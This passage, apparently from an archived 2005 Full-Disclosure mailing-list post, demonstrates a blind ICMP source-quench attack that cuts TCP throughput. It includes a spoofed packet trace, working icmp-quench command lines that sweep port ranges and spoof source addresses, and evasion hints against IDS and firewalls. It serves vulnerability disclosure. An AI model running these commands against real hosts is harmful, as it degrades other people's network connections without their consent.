309025:310473(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226432 32266> (DF) (ttl 64, id 12684)\r\n01:48:00.790070 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 252, id 6804) (ttl 201, id 43029)\r\n01:48:00.910060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 173, id 33976) (ttl 182, id 4152)\r\n01:48:01.030059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 194, id 1202) (ttl 239, id 59037)\r\n01:48:01.150071 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 215, id 21023) (ttl 188, id 33475)\r\n01:48:01.270057 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 108, id 18051) (ttl 109, id 56328)\r\n\r\n\r\nWe have limited the throughput of the connection to about one packet per \r\nround-trip time.\r\n\r\n\r\nNow, what if we don't know the client port?\r\n\r\nThat's not a problem. It's still pretty easy. You can make icmp-quench try \r\nall the possible port numbers for the client:\r\n\r\n# icmp-quench -c 10.0.0.1:1-65535 -s 192.168.0.1:80 -t server -r 100\r\n\r\n\r\nBut attackers are usually a bit more clever than that. Let's say the \r\nattacker has some tool for OS fingerprinting (nmap, for example).\r\nLet's say he discovers the web server is running Windows. Googling a bit, \r\nthe attacker will know that Windows chooses the port numbers for outgoing \r\nconnections from the range 1024-4999. Thus, he can use icmp-quench this way:\r\n\r\n# icmp-quench -c 10.0.0.1:1024-4999 -s 192.168.0.1:80 -t server -r 100\r\n\r\nBy default, icmp-quench spoofs the source address of the ICMP packets (it \r\nwill use the IP address of the peer that is *not* being attacked... 
that's \r\nwhy the ICMP packets come from 10.0.0.1 in the packet trace).\r\n\r\nLet's say the attacker now wants to use the address 200.200.0.1 as the \r\nsource address of his packets (to avoid being egress-filtered, for example):\r\n\r\n# icmp-quench -c 10.0.0.1:1024-4999 -s 192.168.0.1:80 -t server -r 100 -f \r\n200.200.0.1\r\n\r\nThe tools have many other options. Run the tool with no options, and learn \r\nabout them.\r\nBtw, all the packet fields, when it makes sense, are set by default to some \r\nrandom number (just to avoid your IDS/Firewall messing with your audit tests).\r\n\r\nThe icmp-quench tool is available at \r\nhttp://www.gont.com.ar/tools/icmp-attacks .\r\n\r\nShare it with the people that told you these attacks were not easy to \r\nperform, and show them the packet traces you obtain.\r\n\r\nKindest regards,\r\n\r\n--\r\nFernando Gont\r\ne-mail: fernando@gont.com.ar || fgont@acm.org\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2005-07-20T00:00:00", "published": "2005-07-20T00:00:00", "id": "SECURITYVULNS:DOC:9242", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9242", "title": "[Full-disclosure] Trivial BGP attacks (ICMP-based blind throughput-reduction attack)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}